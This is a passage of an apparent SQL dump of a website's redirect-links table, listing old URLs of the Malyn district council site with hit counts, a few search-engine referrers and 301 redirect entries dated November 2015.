00:00:00',301),(16310,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=911:2013-01-22-13-27-41&catid=11&lang=en&Itemid=','','','',2,0,'2015-11-01 11:39:14','0000-00-00 00:00:00',301),(16311,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=911:2013-01-22-13-27-41&catid=11&lang=en&Itemid=0','','','',2,0,'2015-11-01 11:39:15','0000-00-00 00:00:00',301),(16312,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=911:2013-01-22-13-27-41&catid=11&lang=ru&Itemid=0','','','',2,0,'2015-11-01 11:39:19','0000-00-00 00:00:00',301),(16313,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=911:2013-01-22-13-27-41&catid=11&lang=uk&Itemid=0','','','',2,0,'2015-11-01 11:39:21','0000-00-00 00:00:00',301),(16314,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=912:2013-01-22-14-14-06&catid=11&Itemid=14&lang=ru','','','',2,0,'2015-11-01 11:39:26','0000-00-00 00:00:00',301),(16315,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=912:2013-01-22-14-14-06&catid=11&lang=ru&Itemid=','','','',2,0,'2015-11-01 11:39:31','0000-00-00 00:00:00',301),(16316,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=912:2013-01-22-14-14-06&catid=11&lang=ru&Itemid=0','','','',2,0,'2015-11-01 11:39:33','0000-00-00 00:00:00',301),(16317,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=912:2013-01-22-14-14-06&catid=11&lang=uk&Itemid=0','','','',2,0,'2015-11-01 11:39:36','0000-00-00 00:00:00',301),(16318,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=924:2013-02-20-19-06-08&catid=11&lang=ru&Itemid=0','','','',2,0,'2015-11-01 11:39:46','0000-00-00 00:00:00',301),(16319,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=924:2013-02-20-19-06-08&catid=11&lang=uk&Itemid=','','','',2,0,'2015-11-01 11:39:48','0000-00-00 00:00:00',301),(16320,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=924:2013-02-20-19-06-08&catid=11&lang=uk&Itemid=0','','','',2,0,'2015-11-01 11:39:50','0000-00-00 00:00:00',301),(16321,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=927:2013-02-21-09-06-04&catid=47&Itemid=86&lang=en','','','',4,0,'2015-11-01 11:39:51','0000-00-00 00:00:00',301),(16322,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=927:2013-02-21-09-06-04&catid=47&Itemid=86&lang=ru','','','',2,0,'2015-11-01 11:39:54','0000-00-00 00:00:00',301),(16323,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=927:2013-02-21-09-06-04&catid=47:-21022013-&Itemid=86&lang=en','','','',7,0,'2015-11-01 11:39:55','0000-00-00 00:00:00',301),(16324,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=927:2013-02-21-09-06-04&catid=47:-21022013-&Itemid=86&lang=ru','','','',2,0,'2015-11-01 11:39:57','0000-00-00 00:00:00',301),(16325,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=927:2013-02-21-09-06-04&catid=47:-21022013-&Itemid=86&lang=uk','','','',2,0,'2015-11-01 11:39:59','0000-00-00 00:00:00',301),(16326,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=998:1&catid=11&lang=uk&Itemid=0','','','',2,0,'2015-11-01 11:40:05','0000-00-00 00:00:00',301),(16327,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=9:2010-06-05-15-10-04&catid=7:2010-06-05-12-53-35&Itemid=12&lang=uk','','','',4,0,'2015-11-01 11:40:07','0000-00-00 00:00:00',301),(16328,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=30:--30122010-&layout=blog&Itemid=61&lang=en','','','',5,0,'2015-11-01 11:40:51','0000-00-00 00:00:00',301),(16329,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=30:--30122010-&layout=blog&Itemid=61&lang=ru','','','',8,0,'2015-11-01 11:40:52','0000-00-00 00:00:00',301),(16330,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=30:--30122010-&layout=blog&Itemid=61&lang=uk','','','',6,0,'2015-11-01 11:40:54','0000-00-00 00:00:00',301),(16331,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=31:-25032011&layout=blog&Itemid=62&lang=en','','','',2,0,'2015-11-01 11:40:55','0000-00-00 00:00:00',301),(16332,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=31:-25032011&layout=blog&Itemid=62&lang=ru','','','',5,0,'2015-11-01 11:40:57','0000-00-00 00:00:00',301),(16333,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=31:-25032011&layout=blog&Itemid=62&lang=uk','','','',2,0,'2015-11-01 11:40:59','0000-00-00 00:00:00',301),(16334,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=33:-20052011&layout=blog&Itemid=66&lang=en','','','',3,0,'2015-11-01 11:41:00','0000-00-00 00:00:00',301),(16335,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=33:-20052011&layout=blog&Itemid=66&lang=ru','','','',2,0,'2015-11-01 11:41:02','0000-00-00 00:00:00',301),(16336,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=34:--15062011-&layout=blog&Itemid=68&lang=en','','','',5,0,'2015-11-01 11:41:04','0000-00-00 00:00:00',301),(16337,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=34:--15062011-&layout=blog&Itemid=68&lang=ru','','','',2,0,'2015-11-01 11:41:05','0000-00-00 00:00:00',301),(16338,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=34:--15062011-&layout=blog&Itemid=68&lang=uk','','','',5,0,'2015-11-01 11:41:07','0000-00-00 00:00:00',301),(16339,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=37:--21102011-&layout=blog&Itemid=72&lang=en','','','',3,0,'2015-11-01 11:41:08','0000-00-00 00:00:00',301),(16340,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=37:--21102011-&layout=blog&Itemid=72&lang=ru','','','',4,0,'2015-11-01 11:41:10','0000-00-00 00:00:00',301),(16341,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=38:--19122011-&layout=blog&Itemid=73&lang=en','','','',2,0,'2015-11-01 11:41:11','0000-00-00 00:00:00',301),(16342,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=38:--19122011-&layout=blog&Itemid=73&lang=ru','','','',2,0,'2015-11-01 11:41:14','0000-00-00 00:00:00',301),(16343,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=39:-22022012-&layout=blog&Itemid=76&lang=en','','','',4,0,'2015-11-01 11:41:15','0000-00-00 00:00:00',301),(16344,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=39:-22022012-&layout=blog&Itemid=76&lang=ru','','','',2,0,'2015-11-01 11:41:17','0000-00-00 00:00:00',301),(16345,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=39:-22022012-&layout=blog&Itemid=76&lang=uk','','','',6,0,'2015-11-01 11:41:18','0000-00-00 00:00:00',301),(16346,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=40:--28032012-&layout=blog&Itemid=77&lang=en','','','',2,0,'2015-11-01 11:41:20','0000-00-00 00:00:00',301),(16347,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=40:--28032012-&layout=blog&Itemid=77&lang=ru','','','',2,0,'2015-11-01 11:41:21','0000-00-00 00:00:00',301),(16348,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=40:--28032012-&layout=blog&Itemid=77&lang=uk','','','',11,0,'2015-11-01 11:41:23','0000-00-00 00:00:00',301),(16349,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=41:--27042012-&layout=blog&Itemid=78&lang=en','','','',3,0,'2015-11-01 11:41:25','0000-00-00 00:00:00',301),(16350,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=41:--27042012-&layout=blog&Itemid=78&lang=ru','','','',4,0,'2015-11-01 11:41:26','0000-00-00 00:00:00',301),(16351,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=42:--16052012-&layout=blog&Itemid=80&lang=en','','','',2,0,'2015-11-01 11:41:30','0000-00-00 00:00:00',301),(16352,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=42:--16052012-&layout=blog&Itemid=80&lang=ru','','','',2,0,'2015-11-01 11:41:31','0000-00-00 00:00:00',301),(16353,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=42:--16052012-&layout=blog&Itemid=80&lang=uk','','','',2,0,'2015-11-01 11:41:33','0000-00-00 00:00:00',301),(16354,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=43:--25072012-&layout=blog&Itemid=82&lang=en','','','',3,0,'2015-11-01 11:41:34','0000-00-00 00:00:00',301),(16355,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=43:--25072012-&layout=blog&Itemid=82&lang=ru','','','',3,0,'2015-11-01 11:41:36','0000-00-00 00:00:00',301),(16356,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=43:--25072012-&layout=blog&Itemid=82&lang=uk','','','',3,0,'2015-11-01 11:41:38','0000-00-00 00:00:00',301),(16357,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=44:--12092012-&layout=blog&Itemid=83&lang=en','','','',2,0,'2015-11-01 11:41:39','0000-00-00 00:00:00',301),(16358,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=44:--12092012-&layout=blog&Itemid=83&lang=uk','','','',2,0,'2015-11-01 11:41:41','0000-00-00 00:00:00',301),(16359,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=45:--14112012-&layout=blog&Itemid=84&lang=en','','','',3,0,'2015-11-01 11:41:43','0000-00-00 00:00:00',301),(16360,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=45:--14112012-&layout=blog&Itemid=84&lang=ru','','','',15,0,'2015-11-01 11:41:45','0000-00-00 00:00:00',301),(16361,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=45:--14112012-&layout=blog&Itemid=84&lang=uk','','','',7,0,'2015-11-01 11:41:46','0000-00-00 00:00:00',301),(16362,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=46:--21122012&layout=blog&Itemid=85&lang=en','','','',11,0,'2015-11-01 11:41:48','0000-00-00 00:00:00',301),(16363,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=46:--21122012&layout=blog&Itemid=85&lang=ru','','','',4,0,'2015-11-01 11:41:50','0000-00-00 00:00:00',301),(16364,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=46:--21122012&layout=blog&Itemid=85&lang=uk','','','',2,0,'2015-11-01 11:41:52','0000-00-00 00:00:00',301),(16365,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=47:-21022013-&layout=blog&Itemid=86&lang=uk','','','',2,0,'2015-11-01 11:41:53','0000-00-00 00:00:00',301),(16366,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=48:--11032013-&layout=blog&Itemid=87&lang=en','','','',2,0,'2015-11-01 11:41:55','0000-00-00 00:00:00',301),(16367,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=48:--11032013-&layout=blog&Itemid=87&lang=uk','','','',2,0,'2015-11-01 11:41:57','0000-00-00 00:00:00',301),(16368,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=49:--12042013-&layout=blog&Itemid=88&lang=en','','','',2,0,'2015-11-01 11:41:58','0000-00-00 00:00:00',301),(16369,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=49:--12042013-&layout=blog&Itemid=88&lang=ru','','','',3,0,'2015-11-01 11:42:01','0000-00-00 00:00:00',301),(16370,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=50:--23042013-&layout=blog&Itemid=90&lang=en','','','',13,0,'2015-11-01 11:42:05','0000-00-00 00:00:00',301),(16371,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=51:--19072013-&layout=blog&Itemid=92&lang=uk','','','',9,0,'2015-11-01 11:42:06','0000-00-00 00:00:00',301),(16372,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=52:--16082013-&layout=blog&Itemid=93&lang=uk','','','',2,0,'2015-11-01 11:42:08','0000-00-00 00:00:00',301),(16373,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=53:--25102013-&layout=blog&Itemid=94&lang=uk','','','',3,0,'2015-11-01 11:42:10','0000-00-00 00:00:00',301),(16374,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=54:--29112013-&layout=blog&Itemid=95&lang=ru','','','',4,0,'2015-11-01 11:42:12','0000-00-00 00:00:00',301),(16375,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=54:--29112013-&layout=blog&Itemid=95&lang=uk','','','',14,0,'2015-11-01 11:42:13','0000-00-00 00:00:00',301),(16376,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=55:--26122013-&layout=blog&Itemid=96&lang=en','','','',4,0,'2015-11-01 11:42:15','0000-00-00 00:00:00',301),(16377,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=55:--26122013-&layout=blog&Itemid=96&lang=ru','','','',24,0,'2015-11-01 11:42:17','0000-00-00 00:00:00',301),(16378,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=55:--26122013-&layout=blog&Itemid=96&lang=uk','','','',8,0,'2015-11-01 11:42:19','0000-00-00 00:00:00',301),(16379,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=56:--03022014-&layout=blog&Itemid=97&lang=en','','','',3,0,'2015-11-01 11:42:21','0000-00-00 00:00:00',301),(16380,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=56:--03022014-&layout=blog&Itemid=97&lang=ru','','','',4,0,'2015-11-01 11:42:23','0000-00-00 00:00:00',301),(16381,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=57:--15042014-&layout=blog&Itemid=98&lang=en','','','',2,0,'2015-11-01 11:42:26','0000-00-00 00:00:00',301),(16382,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=57:--15042014-&layout=blog&Itemid=98&lang=ru','','','',3,0,'2015-11-01 11:42:28','0000-00-00 00:00:00',301),(16383,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=57:--15042014-&layout=blog&Itemid=98&lang=uk','','','',8,0,'2015-11-01 11:42:30','0000-00-00 00:00:00',301),(16384,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=58:--30042014-&layout=blog&Itemid=105&lang=en','','','',2,0,'2015-11-01 11:42:31','0000-00-00 00:00:00',301),(16385,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=58:--30042014-&layout=blog&Itemid=105&lang=ru','','','',2,0,'2015-11-01 11:42:33','0000-00-00 00:00:00',301),(16386,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=58:--30042014-&layout=blog&Itemid=105&lang=uk','','','',5,0,'2015-11-01 11:42:35','0000-00-00 00:00:00',301),(16387,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=59:--20062014-&layout=blog&Itemid=107&lang=en','','','',2,0,'2015-11-01 11:42:37','0000-00-00 00:00:00',301),(16388,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=59:--20062014-&layout=blog&Itemid=107&lang=ru','','','',5,0,'2015-11-01 11:42:40','0000-00-00 00:00:00',301),(16389,'http://malyn-rayrada.org.ua/admin/login.php','','','',1,0,'2015-11-01 11:57:59','0000-00-00 00:00:00',301),(16390,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=39&Itemid=76&lang=uk','','','',7,0,'2015-11-01 12:11:22','0000-00-00 00:00:00',301),(16391,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/682-pro-zatverdzhennja-rajonnoi-programi_3','','http://www.yandex.ua/clck/jsredir?from=www.yandex.ua%3Bsearch%2F%3Bweb%3B%3B&text=&etext=859.U0xJd5rr1z58v8rXqEQEVadU-QaduPrpuvQ0AJ6pP7neHI-ZkInJrhaLM','',37,0,'2015-11-01 12:28:08','0000-00-00 00:00:00',301),(16392,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=506:-lr&catid=38:--19122011-&Itemid=73&lang=ru','','','',6,0,'2015-11-01 12:31:51','0000-00-00 00:00:00',301),(16393,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=44&Itemid=83&lang=uk','','','',2,0,'2015-11-01 12:47:50','0000-00-00 00:00:00',301),(16394,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011?limitstart=0','','','',6,0,'2015-11-01 13:06:06','0000-00-00 00:00:00',301),(16395,'http://www.malyn-rayrada.org.ua/attachments/124_reiting 6 mis 2011.PDF','','','',65,0,'2015-11-01 13:06:16','0000-00-00 00:00:00',301),(16396,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&catid=37&id=418:2011-09-29-08-40-03&lang=uk&option=com_content&view=article','','','',4,0,'2015-11-01 13:14:50','0000-00-00 00:00:00',301),(16397,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-?start=7','','http://go.mail.ru/search_images','',39,0,'2015-11-01 13:31:13','0000-00-00 00:00:00',301),(16398,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/58-rishennja-radi/rishennja/--19122011-?lang=uk&start=28','','http://go.mail.ru/search_images','',2,0,'2015-11-01 14:45:20','0000-00-00 00:00:00',301),(16399,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/images/stories/prokopenko_m_t.JPG','','','',1,0,'2015-11-01 14:58:26','0000-00-00 00:00:00',301),(16400,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=678:----------------2012-2014-&catid=42:--16052012-&Itemid=80&lang=uk','','','',16,0,'2015-11-01 15:08:48','0000-00-00 00:00:00',301),(16401,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1087-pro-plan-roboti-rajonnoji-radi-na-ii-pivrichchya-2015-roku','','','',23,0,'2015-11-01 15:27:57','0000-00-00 00:00:00',301),(16402,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&id=45:--14112012-&lang=en&layout=blog&option=com_content&view=category','','','',3,0,'2015-11-01 15:47:28','0000-00-00 00:00:00',301),(16403,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=56&Itemid=97&lang=ru','','','',14,0,'2015-11-01 15:54:30','0000-00-00 00:00:00',301),(16404,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=49&Itemid=88&lang=uk','','','',33,0,'2015-11-01 15:57:45','0000-00-00 00:00:00',301),(16405,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku/1200-pro-povtorne-zvernennya-do-prokuraturi-malinskogo-rajonu','','','',19,0,'2015-11-01 16:06:09','0000-00-00 00:00:00',301),(16406,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=274:2011-03-28-08-22-32&catid=31:-25032011&Itemid=62&lang=uk','','','',20,0,'2015-11-01 16:13:05','0000-00-00 00:00:00',301),(16407,'http://www.malyn-rayrada.org.ua/attachments/article/26/history malyn region3.PDF','','','',41,0,'2015-11-01 16:14:17','0000-00-00 00:00:00',301),(16408,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1049-pro-zatverdzhennya-redaktora-gazeti-malinski-novini','','','',27,0,'2015-11-01 16:21:07','0000-00-00 00:00:00',301),(16409,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=166:-6-&catid=5:2010-06-05-12-51-34&Itemid=6&lang=ru','','','',33,0,'2015-11-01 16:29:17','0000-00-00 00:00:00',301),(16411,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/76-rishennya-vid-29-07-2015-roku/1170-pro-zatverdzhennya-tekhnichnikh-dokumentatsij-po-viznachennyu-normativnoji-groshovoji-otsinki-zemelnikh-dilyanok-shcho-p','','','',1,0,'2015-11-01 16:40:50','0000-00-00 00:00:00',301),(16412,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=56:--03022014-&layout=blog&Itemid=97&lang=en&limitstart=5','','','',11,0,'2015-11-01 16:46:16','0000-00-00 00:00:00',301),(16413,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-?start=14','','','',22,0,'2015-11-01 16:53:47','0000-00-00 00:00:00',301),(16414,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku/912-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi','','','',17,0,'2015-11-01 16:57:21','0000-00-00 00:00:00',301),(16415,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/273-pro-ne-zaperechennja-shhodo-nadannja-v_2','','','',57,0,'2015-11-01 17:07:14','0000-00-00 00:00:00',301),(16416,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku/1194-pro-programu-vidshkoduvannya-vidsotkiv-za-kreditami-otrimanimi-naselennyam-malinskogo-rajonu-na-vprovadzhennya-energozberigayuchikh-zakhodiv-u-2015-rotsi','','','',19,0,'2015-11-01 17:08:39','0000-00-00 00:00:00',301),(16417,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/980-pro-vikonannya-planu-roboti-rajonnoji-radi-za-2014-rik-ta-plan-roboti-rajonnoji-radi-na-i-pivrichchya-2015-roku','','','',14,0,'2015-11-01 17:11:50','0000-00-00 00:00:00',301),(16418,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1045-pro-zatverdzhennya-statutu-redaktsiji-gazeti-malinski-novini-v-novij-redaktsiji','','','',24,0,'2015-11-01 17:17:46','0000-00-00 00:00:00',301),(16419,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1023-pro-zatverdzhennya-zvitu-pro-otsinka-ob-ekta-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-rajonu','','','',26,0,'2015-11-01 17:25:44','0000-00-00 00:00:00',301),(16420,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/985-pro-zatverdzhennya-strukturi-ta-chiselnosti-vikonavchogo-aparatu-radi-vitrat-na-jogo-utrimannya','','','',17,0,'2015-11-01 17:47:59','0000-00-00 00:00:00',301),(16423,'http://malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=597:-l-r-2011-&itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-11-01 17:59:35','0000-00-00 00:00:00',301),(16425,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1111-pro-informatsiyu-prokuraturi-malinskogo-rajonu-pro-stan-zakonnosti-zakhodi-shchodo-jiji-zmitsnennya-ta-rezultati-diyalnosti-na-teritoriji-rajonu','','','',12,0,'2015-11-01 18:19:13','0000-00-00 00:00:00',301),(16426,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/149-pro-hid-vikonannja-rajonnoi-programi_4?tmpl=component&print=1&layout=default&page=','','','',11,0,'2015-11-01 18:26:12','0000-00-00 00:00:00',301),(16427,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/47-pro-vnesennja-zmin-do-reglamentu-roboti-rajonnoi?tmpl=component&print=1&layout=default&page=','','','',11,0,'2015-11-01 18:26:13','0000-00-00 00:00:00',301),(16428,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/831-pro-obrannja-zastupnika-golovi-rajonnoi-radi_2?tmpl=component&print=1&layout=default&page=','','','',11,0,'2015-11-01 18:26:30','0000-00-00 00:00:00',301),(16429,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/50-pro-peredachu-knigi?tmpl=component&print=1&layout=default&page=','','','',11,0,'2015-11-01 18:26:40','0000-00-00 00:00:00',301),(16430,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/51-pro-pogodzhennja-klopotannja-shhodo-otrimannja?tmpl=component&print=1&layout=default&page=','','','',11,0,'2015-11-01 18:26:41','0000-00-00 00:00:00',301),(16431,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/53-pro-zatverdzhennja-tehnichnoi-dokumentacii-po_2?tmpl=component&print=1&layout=default&page=','','','',11,0,'2015-11-01 18:26:43','0000-00-00 00:00:00',301),(16432,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/147-pro-zvernennja-do-prezidenta-ukraini-shhodo?tmpl=component&print=1&layout=default&page=','','','',10,0,'2015-11-01 18:26:56','0000-00-00 00:00:00',301),(16433,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/148-pro-priznachennja-kerivnika-komunalnogo?tmpl=component&print=1&layout=default&page=','','','',10,0,'2015-11-01 18:26:57','0000-00-00 00:00:00',301),(16434,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/350-pro-zatverdzhennja-tehnichnoi-dokumentacii-po_5?tmpl=component&print=1&layout=default&page=','','','',11,0,'2015-11-01 18:26:59','0000-00-00 00:00:00',301),(16435,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/153-pro-rozgljad-protestu-prokurora-malinskogo-rajonu?tmpl=component&print=1&layout=default&page=','','','',10,0,'2015-11-01 18:27:25','0000-00-00 00:00:00',301),(16436,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/221-pro-zvit-kerivnika-komunalnogo-pidpriemstva?tmpl=component&print=1&layout=default&page=','','','',11,0,'2015-11-01 18:27:26','0000-00-00 00:00:00',301),(16437,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/236-pro-utvorennja-deputatskoi-grupi-ridna-malinshhina?tmpl=component&print=1&layout=default&page=','','','',10,0,'2015-11-01 18:27:30','0000-00-00 00:00:00',301),(16438,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30042014-/789-pro-peredachu-budivli-lokomotivnogo-depo-na-balans_2?tmpl=component&print=1&layout=default&page=','','','',11,0,'2015-11-01 18:27:46','0000-00-00 00:00:00',301),(16439,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30042014-/793-pro-zvernennja-do-malinskoi-miskoi-radi?tmpl=component&print=1&layout=default&page=','','','',10,0,'2015-11-01 18:27:48','0000-00-00 00:00:00',301),(16440,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22102010-/63-pro-utvorennja-robochoi-komisii-z-pidgotovki?tmpl=component&print=1&layout=default&page=','','','',11,0,'2015-11-01 18:28:11','0000-00-00 00:00:00',301),(16441,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22102010-/67-pro-zatverdzhennja-strukturi-ta-chiselnosti?tmpl=component&print=1&layout=default&page=','','','',12,0,'2015-11-01 18:28:13','0000-00-00 00:00:00',301),(16442,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/76-rishennya-vid-29-07-2015-roku/1168-pro-zapit-deputata-rajonnoji-radi-sidorchuka-v-i-shchodo-nezakonnogo-budivnitstva','','','',25,0,'2015-11-01 18:40:43','0000-00-00 00:00:00',301),(16443,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1095-pro-zatverdzhennya-rezultativ-auktsionnikh-torgiv-z-prodazhu-ob-ekta-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-rajonu','','','',21,0,'2015-11-01 18:45:20','0000-00-00 00:00:00',301),(16444,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=530:-4050-vi-l-r-1-2013-&catid=11&lang=ru','','','',9,0,'2015-11-01 18:52:33','0000-00-00 00:00:00',301),(16445,'http://www.malyn-rayrada.org.ua/index.php/1138-vishivska-silska-rada-informue','','','',19,0,'2015-11-01 18:53:05','0000-00-00 00:00:00',301),(16446,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=819:2012-11-14-16-40-09&catid=45&Itemid=84&lang=uk','','','',17,0,'2015-11-01 18:53:16','0000-00-00 00:00:00',301),(16447,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=315:2011-05-20-13-07-47&catid=33&Itemid=66&lang=uk','','','',16,0,'2015-11-01 18:56:00','0000-00-00 